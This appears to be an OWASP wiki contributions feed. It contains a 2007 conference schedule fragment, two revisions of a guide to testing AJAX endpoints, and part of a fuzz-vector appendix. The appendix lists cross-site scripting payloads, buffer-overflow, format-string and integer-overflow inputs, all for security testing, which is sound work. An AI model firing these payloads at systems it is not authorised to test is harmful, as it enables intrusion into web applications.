OWASP Conferences Chair ([http://www.owasp.org/images/e/e7/OWASP-WASCAppSec2007SanJose_Intro-Final.ppt ppt])<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 18:30-20:30 || colspan=&quot;2&quot; style=&quot;width:80%; background:#C2C2C2&quot; align=&quot;left&quot; | Microsoft and Aspect Security Cosponsored Cocktail Party: Drinks at Holiday Inn. (1740 N. 1st St. San Jose)<br /> |}<br /> <br /> == Nov 14: Track 3: Web Services Security ==<br /> <br /> {| style=&quot;width:80%&quot; border=&quot;0&quot; align=&quot;center&quot;<br /> ! colspan=&quot;3&quot; align=&quot;center&quot; style=&quot;background:#4058A0; color:white&quot; | Day 1 - Nov 14, 2007<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | || style=&quot;width:80%; background:#BC857A&quot; | Track 3: Web Services Security<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 11:10-11:30 || colspan=&quot;2&quot; style=&quot;width:80%; background:#C2C2C2&quot; align=&quot;left&quot; | Break<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 11:30-12:30 || style=&quot;width:80%; background:#BC857A&quot; align=&quot;left&quot; | The Top 10 Web Services Security Issues ([http://www.owasp.org/images/2/2f/OWASP-WASCAppSec2007SanJose_Top10WebServicesIssues.ppt ppt]), Gunnar Peterson, Principle, Arctec Group<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 12:30-13:45 || colspan=&quot;2&quot; style=&quot;width:80%; background:#C2C2C2&quot; align=&quot;left&quot; | Lunch<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 13:45-14:30 || style=&quot;width:80%; background:#BC857A&quot; align=&quot;left&quot; | Centralized, Dynamic Web Services Security and Policy Management, Richard Salz, IBM<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 14:30-15:10 || style=&quot;width:80%; background:#BC857A&quot; align=&quot;left&quot; | Covert CDATA Channels, XML Bombs, and Unexpected Attachments: Case Notes from a real-life XML Web Services Vulnerability Assessment, Mark O'Neill, CTO Vordel<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 15:10-15:30 || colspan=&quot;2&quot; style=&quot;width:80%; background:#C2C2C2&quot; align=&quot;left&quot; | Break<br /> |-<br /> | style=&quot;width:10%; background:#7B8ABD&quot; | 15:30-16:40 || style=&quot;width:80%; background:#BC857A&quot; align=&quot;left&quot; | Attacking XML Security, Brad Hill, Principal Security Consultant, iSEC Partners<br /> |}</div> Wisec https://wiki.owasp.org/index.php?title=AJAX_How_to_test_AoC&diff=14481 AJAX How to test AoC 2006-12-18T20:47:02Z <p>Wisec: /* References */</p> <hr /> <div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br&gt;<br /> {{Template:OWASP Testing Guide v2}}<br /> <br /> == Brief Summary ==<br /> &lt;br&gt;<br /> Because most attacks against AJAX applications are analogs of attacks against traditional web applications, testers should refer to other sections of the testing guide to look for specific parameter manipulations to use in order to discover vulnerabilities. The challenge with AJAX-enabled applications is often finding the endpoints that are the targets for the asynchronous calls and then determining the proper format for requests.<br /> &lt;br&gt;<br /> <br /> == Description of the Issue == <br /> &lt;br&gt;<br /> Traditional web applications are fairly easy to discover in an automated fashion. An application typically has one or more pages that are connected by HREFs or other links. Interesting pages will have one or more HTML FORMs. These forms will have one or more parameters. By using simple spidering techniques such as looking for anchor (A) tags and HTML FORMs it should be possible to discover all pages, forms, and parameters in a traditional web application. Requests made to this application follow a well-known and consistent format laid out in the HTTP specification. GET requests have the format:<br /> <br /> &lt;nowiki&gt;http://server.com/directory/resource.cgi?param1=value1&amp;key=value&lt;/nowiki&gt;<br /> <br /> POST requests are sent to URLs in a similar fashion:<br /> <br /> &lt;nowiki&gt;http://server.com/directory/resource.cgi&lt;/nowiki&gt;<br /> <br /> Data sent to POST requests is encoded in a similar format and included in the request after the headers:<br /> <br /> param1=value1&amp;key=value<br /> <br /> Unfortunately, server-side AJAX endpoints are not as easy or consistent to discover, and the format of actual valid requests is left to the AJAX framework in use or the discretion of the developer. Therefore to fully test AJAX-enabled applications, testers need to be aware of the frameworks in use, the AJAX endpoints that are available, and the required format for requests to be considered valid. Once this understanding has been developed, standard parameter manipulation techniques using a proxy can be used to test for SQL injection and other flaws.<br /> &lt;br&gt;<br /> <br /> == Black Box testing and example ==<br /> '''Testing for AJAX Endpoints:''' &lt;br&gt;<br /> Before an AJAX-enabled web application can be tested, the call endpoints for the asynchronous calls must be enumerated. See [[Application_Discovery_AoC]] for more information about how traditional web applications are discovered. For AJAX applications, there are two main approaches to determining call endpoints: parsing the HTML and JavaScript files and using a proxy to observe traffic.<br /> <br /> The advantage of parsing the HTML and JavaScript files in a web application is that it can provide a more comprehensive view of the server-side capabilities that can be accessed from the client side. The drawback is that manually reviewing HTML and JavaScript content is tedious and, more importantly, the location and format of server-side URLs available to be accessed by AJAX calls are framework dependent.<br /> <br /> The tester should look through HTML and JavaScript files to find URLs of additional application surface exposure. Searching for use of the XMLHttpRequest object in JavaScript code can help to focus these reviewing efforts. Also, by knowing the names of included JavaScript files, the tester can determine which AJAX frameworks appear to be in use. Once AJAX endpoints have been identified, the tester should further inspect the code to determine the format required of requests.<br /> <br /> &lt;br&gt;<br /> [[Image:ExampleAtlasPage.PNG]]<br /> &lt;br&gt;<br /> &lt;br&gt;<br /> <br /> The advantage of using a proxy to observe traffic is that the actual requests demonstrate conclusively where the application is sending requests and what format those requests are in. The disadvantage is that only the endpoints that the application actually makes calls to will be revealed. The tester must fully exercise the remote application, and even then there could be additional call endpoints that are available but not actively in use. In exercising the application, the proxy should observe traffic to both the user-viewable pages and the background asynchronous traffic to the AJAX endpoints. Capturing this session traffic data allows the tester to determine all of the HTTP requests that are being made during the session as opposed to only looking at the user-viewable pages in the application.<br /> <br /> &lt;br&gt;<br /> [[Image:ExampleAtlasRequest.jpg]]<br /> &lt;br&gt;<br /> &lt;br&gt;<br /> '''Result Expected:'''&lt;br&gt;<br /> By enumerating the AJAX endpoints available in an application and determining the required request format, the tester can set the stage for further analysis of the application. Once endpoints and proper request formats have been determined, the tester can use a web proxy and standard web application parameter manipulation techniques to look for SQL injection and parameter tampering attacks.&lt;br&gt;&lt;br&gt;<br /> <br /> '''Intercepting and debugging js code with Browsers'''<br /> <br /> By Using normal browsers it's possible to <br /> analyze into detail js based web applications. &lt;br&gt;<br /> Ajax calls in firefox can be intercepted by using <br /> extension plugins that monitor the code flow. &lt;br&gt;<br /> Two extensions providing this ability are &quot;FireBug&quot; and<br /> &quot;Venkman JavaScript Debugger&quot;.<br /> <br /> For Internet Explorer are available some tools <br /> provided by Microsoft like &quot;script Debugger&quot;, <br /> that permits real-time js debugging.<br /> <br /> By using Firebug on a page, a tester could find Ajax endpoints<br /> by setting &quot;Options-&gt;Show XmlHttpRequest&quot;.<br /> <br /> [[Image:Firebug1.jpg]]<br /> <br /> From now on, any request accomplished by XMLHttpRequest object will be listed on the bottom of<br /> the browser.&lt;br&gt;<br /> <br /> On the right of the Url is displayed source script and line from <br /> where the call was done and by clicking on the displayed Url,<br /> server response is shown.&lt;br&gt;<br /> So it's straightforward to understand where the request is done,<br /> what was the response and where is the endpoint. &lt;br&gt;<br /> If the link to source script is clicked, the tester could find where the request originated.<br /> <br /> [[Image:Firebug_2.jpg]]<br /> <br /> As debugging Javascript is the way to learn how scripts build<br /> urls, and how many parameters are available, by filling the form when the password is written down and the related input tag loses its focus, a new request is accomplished as could be seen on the following screenshot.<br /> <br /> [[Image:Firebug_3.jpg]]<br /> <br /> Now, by clicking on the link to js source code, the tester has access to the next endpoint.<br /> <br /> <br /> [[Image:Firebug_4.jpg]]<br /> <br /> <br /> Then by setting breakpoints on some lines near the javascript endpoint, it's easy to know the call stack as shown in the next screenshot.<br /> <br /> <br /> [[Image:Firebug_5.jpg]]<br /> <br /> == Gray Box testing and example == <br /> '''Testing for AJAX Endpoints:'''&lt;br&gt;<br /> Access to additional information about the application source code can greatly speed efforts to enumerate AJAX endpoints, and the knowledge of what frameworks are in use will help the tester to understand the required format for AJAX requests.<br /> &lt;br&gt;<br /> '''Result Expected:'''&lt;br&gt;<br /> Knowledge of the frameworks being used and AJAX endpoints that are available helps the tester to focus his efforts and reduce the time required for discover and application footprinting.&lt;br&gt;&lt;br&gt;<br /> <br /> == References ==<br /> '''Whitepapers'''&lt;br&gt;<br /> * [http://www.securityfocus.com/infocus/1879 Hacking Web 2.0 Applications with Firefox], Shreeraj Shah<br /> * [http://www.securityfocus.com/infocus/1881 Vulnerability Scanning Web 2.0 Client-Side Components], Shreeraj Shah<br /> '''Tools'''&lt;br&gt;<br /> * The OWASP Sprajax tool [[Category:OWASP_Sprajax_Project]] can be used to spider web applications, identify AJAX frameworks in use, enumerate AJAX call endpoints, and fuzz those endpoints with framework-appropriate traffic. At the current time, there is only support for the Microsoft Atlas framework (and detection for the Google Web Toolkit), but ongoing development should increase the utility of the tool.<br /> * '''Venkman''' &lt;br&gt; [http://www.mozilla.org/projects/venkman/ Venkman]is the code name for Mozilla's JavaScript Debugger. Venkman aims to provide a powerful JavaScript debugging environment for Mozilla based browsers.<br /> * ''' Ghost Train'''&lt;br&gt;[http://wiki.script.aculo.us/scriptaculous/show/GhostTrain Scriptaculous's Ghost Train] is a tool to ease the development of functional tests for web sites. It’s a event recorder, and a test-generating and replaying add-on you can use with any web application.<br /> * '''Squish/Web (froglogic)'''<br /> [http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows you to record, edit, and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests.<br /> * '''JsUnit'''&lt;br&gt;[http://www.edwardh.com/jsunit/ JsUnit] is a Unit Testing framework for client-side (in-browser) JavaScript. It is essentially a port of JUnit to JavaScript.<br /> * '''Firebug'''&lt;br&gt;[https://addons.mozilla.org/firefox/1843/ FireBug] lets you explore the far corners of the DOM by keyboard or mouse. All of the tools you need to poke, prod, and monitor your JavaScript, CSS, HTML and Ajax are brought together into one seamless experience, including a debugger, an error console, command line, and a variety of fun inspectors.<br /> <br /> {{Category:OWASP Testing Project AoC}}</div> Wisec https://wiki.owasp.org/index.php?title=AJAX_How_to_test_AoC&diff=14480 AJAX How to test AoC 2006-12-18T20:40:45Z <p>Wisec: /* Black Box testing and example */</p> <hr /> <div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br&gt;<br /> {{Template:OWASP Testing Guide v2}}<br /> <br /> == Brief Summary ==<br /> &lt;br&gt;<br /> Because most attacks against AJAX applications are analogs of attacks against traditional web applications, testers should refer to other sections of the testing guide to look for specific parameter manipulations to use in order to discover vulnerabilities. The challenge with AJAX-enabled applications is often finding the endpoints that are the targets for the asynchronous calls and then determining the proper format for requests.<br /> &lt;br&gt;<br /> <br /> == Description of the Issue == <br /> &lt;br&gt;<br /> Traditional web applications are fairly easy to discover in an automated fashion. An application typically has one or more pages that are connected by HREFs or other links. Interesting pages will have one or more HTML FORMs. These forms will have one or more parameters. By using simple spidering techniques such as looking for anchor (A) tags and HTML FORMs it should be possible to discover all pages, forms, and parameters in a traditional web application. Requests made to this application follow a well-known and consistent format laid out in the HTTP specification. GET requests have the format:<br /> <br /> &lt;nowiki&gt;http://server.com/directory/resource.cgi?param1=value1&amp;key=value&lt;/nowiki&gt;<br /> <br /> POST requests are sent to URLs in a similar fashion:<br /> <br /> &lt;nowiki&gt;http://server.com/directory/resource.cgi&lt;/nowiki&gt;<br /> <br /> Data sent to POST requests is encoded in a similar format and included in the request after the headers:<br /> <br /> param1=value1&amp;key=value<br /> <br /> Unfortunately, server-side AJAX endpoints are not as easy or consistent to discover, and the format of actual valid requests is left to the AJAX framework in use or the discretion of the developer. Therefore to fully test AJAX-enabled applications, testers need to be aware of the frameworks in use, the AJAX endpoints that are available, and the required format for requests to be considered valid. Once this understanding has been developed, standard parameter manipulation techniques using a proxy can be used to test for SQL injection and other flaws.<br /> &lt;br&gt;<br /> <br /> == Black Box testing and example ==<br /> '''Testing for AJAX Endpoints:''' &lt;br&gt;<br /> Before an AJAX-enabled web application can be tested, the call endpoints for the asynchronous calls must be enumerated. See [[Application_Discovery_AoC]] for more information about how traditional web applications are discovered. For AJAX applications, there are two main approaches to determining call endpoints: parsing the HTML and JavaScript files and using a proxy to observe traffic.<br /> <br /> The advantage of parsing the HTML and JavaScript files in a web application is that it can provide a more comprehensive view of the server-side capabilities that can be accessed from the client side. The drawback is that manually reviewing HTML and JavaScript content is tedious and, more importantly, the location and format of server-side URLs available to be accessed by AJAX calls are framework dependent.<br /> <br /> The tester should look through HTML and JavaScript files to find URLs of additional application surface exposure. Searching for use of the XMLHttpRequest object in JavaScript code can help to focus these reviewing efforts. Also, by knowing the names of included JavaScript files, the tester can determine which AJAX frameworks appear to be in use. Once AJAX endpoints have been identified, the tester should further inspect the code to determine the format required of requests.<br /> <br /> &lt;br&gt;<br /> [[Image:ExampleAtlasPage.PNG]]<br /> &lt;br&gt;<br /> &lt;br&gt;<br /> <br /> The advantage of using a proxy to observe traffic is that the actual requests demonstrate conclusively where the application is sending requests and what format those requests are in. The disadvantage is that only the endpoints that the application actually makes calls to will be revealed. The tester must fully exercise the remote application, and even then there could be additional call endpoints that are available but not actively in use. In exercising the application, the proxy should observe traffic to both the user-viewable pages and the background asynchronous traffic to the AJAX endpoints. Capturing this session traffic data allows the tester to determine all of the HTTP requests that are being made during the session as opposed to only looking at the user-viewable pages in the application.<br /> <br /> &lt;br&gt;<br /> [[Image:ExampleAtlasRequest.jpg]]<br /> &lt;br&gt;<br /> &lt;br&gt;<br /> '''Result Expected:'''&lt;br&gt;<br /> By enumerating the AJAX endpoints available in an application and determining the required request format, the tester can set the stage for further analysis of the application. Once endpoints and proper request formats have been determined, the tester can use a web proxy and standard web application parameter manipulation techniques to look for SQL injection and parameter tampering attacks.&lt;br&gt;&lt;br&gt;<br /> <br /> '''Intercepting and debugging js code with Browsers'''<br /> <br /> By Using normal browsers it's possible to <br /> analyze into detail js based web applications. &lt;br&gt;<br /> Ajax calls in firefox can be intercepted by using <br /> extension plugins that monitor the code flow. &lt;br&gt;<br /> Two extensions providing this ability are &quot;FireBug&quot; and<br /> &quot;Venkman JavaScript Debugger&quot;.<br /> <br /> For Internet Explorer are available some tools <br /> provided by Microsoft like &quot;script Debugger&quot;, <br /> that permits real-time js debugging.<br /> <br /> By using Firebug on a page, a tester could find Ajax endpoints<br /> by setting &quot;Options-&gt;Show XmlHttpRequest&quot;.<br /> <br /> [[Image:Firebug1.jpg]]<br /> <br /> From now on, any request accomplished by XMLHttpRequest object will be listed on the bottom of<br /> the browser.&lt;br&gt;<br /> <br /> On the right of the Url is displayed source script and line from <br /> where the call was done and by clicking on the displayed Url,<br /> server response is shown.&lt;br&gt;<br /> So it's straightforward to understand where the request is done,<br /> what was the response and where is the endpoint. &lt;br&gt;<br /> If the link to source script is clicked, the tester could find where the request originated.<br /> <br /> [[Image:Firebug_2.jpg]]<br /> <br /> As debugging Javascript is the way to learn how scripts build<br /> urls, and how many parameters are available, by filling the form when the password is written down and the related input tag loses its focus, a new request is accomplished as could be seen on the following screenshot.<br /> <br /> [[Image:Firebug_3.jpg]]<br /> <br /> Now, by clicking on the link to js source code, the tester has access to the next endpoint.<br /> <br /> <br /> [[Image:Firebug_4.jpg]]<br /> <br /> <br /> Then by setting breakpoints on some lines near the javascript endpoint, it's easy to know the call stack as shown in the next screenshot.<br /> <br /> <br /> [[Image:Firebug_5.jpg]]<br /> <br /> == Gray Box testing and example == <br /> '''Testing for AJAX Endpoints:'''&lt;br&gt;<br /> Access to additional information about the application source code can greatly speed efforts to enumerate AJAX endpoints, and the knowledge of what frameworks are in use will help the tester to understand the required format for AJAX requests.<br /> &lt;br&gt;<br /> '''Result Expected:'''&lt;br&gt;<br /> Knowledge of the frameworks being used and AJAX endpoints that are available helps the tester to focus his efforts and reduce the time required for discover and application footprinting.&lt;br&gt;&lt;br&gt;<br /> <br /> == References ==<br /> '''Whitepapers'''&lt;br&gt;<br /> * ...&lt;br&gt;<br /> '''Tools'''&lt;br&gt;<br /> * The OWASP Sprajax tool [[Category:OWASP_Sprajax_Project]] can be used to spider web applications, identify AJAX frameworks in use, enumerate AJAX call endpoints, and fuzz those endpoints with framework-appropriate traffic. At the current time, there is only support for the Microsoft Atlas framework (and detection for the Google Web Toolkit), but ongoing development should increase the utility of the tool.<br /> * '''Venkman''' &lt;br&gt; [http://www.mozilla.org/projects/venkman/ Venkman]is the code name for Mozilla's JavaScript Debugger. Venkman aims to provide a powerful JavaScript debugging environment for Mozilla based browsers.<br /> * ''' Ghost Train'''&lt;br&gt;[http://wiki.script.aculo.us/scriptaculous/show/GhostTrain Scriptaculous's Ghost Train] is a tool to ease the development of functional tests for web sites. It’s a event recorder, and a test-generating and replaying add-on you can use with any web application.<br /> * '''Squish/Web (froglogic)'''<br /> [http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows you to record, edit, and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests.<br /> * '''JsUnit'''&lt;br&gt;[http://www.edwardh.com/jsunit/ JsUnit] is a Unit Testing framework for client-side (in-browser) JavaScript. It is essentially a port of JUnit to JavaScript.<br /> <br /> <br /> {{Category:OWASP Testing Project AoC}}</div> Wisec https://wiki.owasp.org/index.php?title=File:Firebug_5.jpg&diff=14479 File:Firebug 5.jpg 2006-12-18T20:15:57Z <p>Wisec: Ajax Testing 5</p> <hr /> <div>Ajax Testing 5</div> Wisec https://wiki.owasp.org/index.php?title=File:Firebug_4.jpg&diff=14478 File:Firebug 4.jpg 2006-12-18T20:15:36Z <p>Wisec: Ajax Testing 4</p> <hr /> <div>Ajax Testing 4</div> Wisec https://wiki.owasp.org/index.php?title=File:Firebug_3.jpg&diff=14477 File:Firebug 3.jpg 2006-12-18T20:15:09Z <p>Wisec: Ajax Testing 3</p> <hr /> <div>Ajax Testing 3</div> Wisec https://wiki.owasp.org/index.php?title=File:Firebug_2.jpg&diff=14476 File:Firebug 2.jpg 2006-12-18T20:14:48Z <p>Wisec: Ajax Testing 2</p> <hr /> <div>Ajax Testing 2</div> Wisec https://wiki.owasp.org/index.php?title=File:Firebug1.jpg&diff=14475 File:Firebug1.jpg 2006-12-18T20:14:05Z <p>Wisec: Ajax Testing 1</p> <hr /> <div>Ajax Testing 1</div> Wisec https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&diff=13702 OWASP Testing Guide Appendix C: Fuzz Vectors 2006-11-26T14:27:10Z <p>Wisec: /* Passive SQL Injection (SQP) */</p> <hr /> <div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br&gt;<br /> {{Template:OWASP Testing Guide v2}}<br /> <br /> <br /> The following are fuzzing vectors which can be used with webscarab, jbrofuzz or another fuzzer.<br /> Fuzzing is the &quot;kitchen sink&quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.<br /> This is the simple part of the discovery phase.<br /> Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.<br /> <br /> === Fuzz Categories ===<br /> <br /> In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:<br /> <br /> * Recursive fuzzing<br /> * Replasive fuzzing<br /> <br /> We examine and define each category in the sub-sections that follow. <br /> <br /> ==== Recursive fuzzing ====<br /> <br /> Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Selecting &quot;8302fa3b&quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:<br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/00000000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/11000fff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/ffffffff&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> ==== Replasive fuzzing ====<br /> <br /> Replasive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: <br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> This is a form of replasive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. <br /> <br /> The remainder of this appendix presents a number of fuzz vector categories.<br /> <br /> === Cross Site Scripting (XSS) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;STYLE&gt;@import&quot;javascript:alert('XSS')&quot;;&lt;/STYLE&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;&quot;'&gt;&lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;%22%27&gt;&lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;&quot;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;javascript:alert('XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=javascript:alert('XSS')&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt; &lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;quot;XSS&lt;WBR&gt;&amp;amp;quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;&lt;WBR&gt;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;&lt;WBR&gt;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;&lt;WBR&gt;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83&lt;WBR&gt;;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG<br /> SRC=&amp;#0000106&amp;#0000097&amp;&lt;WBR&gt;#0000118&amp;#0000097&amp;#0000115&amp;&lt;WBR&gt;#0000099&amp;#0000114&amp;#0000105&amp;&lt;WBR&gt;#0000112&amp;#0000116&amp;#0000058&amp;&lt;WBR&gt;#0000097&amp;#0000108&amp;#0000101&amp;&lt;WBR&gt;#0000114&amp;#0000116&amp;#0000040&amp;&lt;WBR&gt;#0000039&amp;#0000088&amp;#0000083&amp;&lt;WBR&gt;#0000083&amp;#0000039&amp;#0000041&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;&lt;WBR&gt;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;&lt;WBR&gt;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;&lt;WBR&gt;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x09;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0A;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0D;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Buffer Overflows (BFO) ===<br /> <br /> Brief description here. <br /> <br /> Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.<br /> <br /> &lt;nowiki&gt;A x 5&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 17&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 33&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 65&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 129&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 257&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 513&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 1024&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 2049&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 4097&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 8193&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 12288&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Format String Errors (FSE) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;%s%p%x%d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;.1024d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%.2049d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%p%p%p%p&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%x%x%x%x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%d%d%d%d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s%s%s%s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%99999999999s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%08x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20n&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s%s%s%s%s%s%s%s%s%s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%p%p%p%p%p%p%p%p%p%p&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s x 129&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%x x 257&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Integer Overflows (INT) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;-1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x100&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x1000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x3fffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x7ffffffe&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x7fffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x80000000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0xfffffffe&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0xffffffff&lt;/nowiki&gt;&lt;br&gt;<br /> 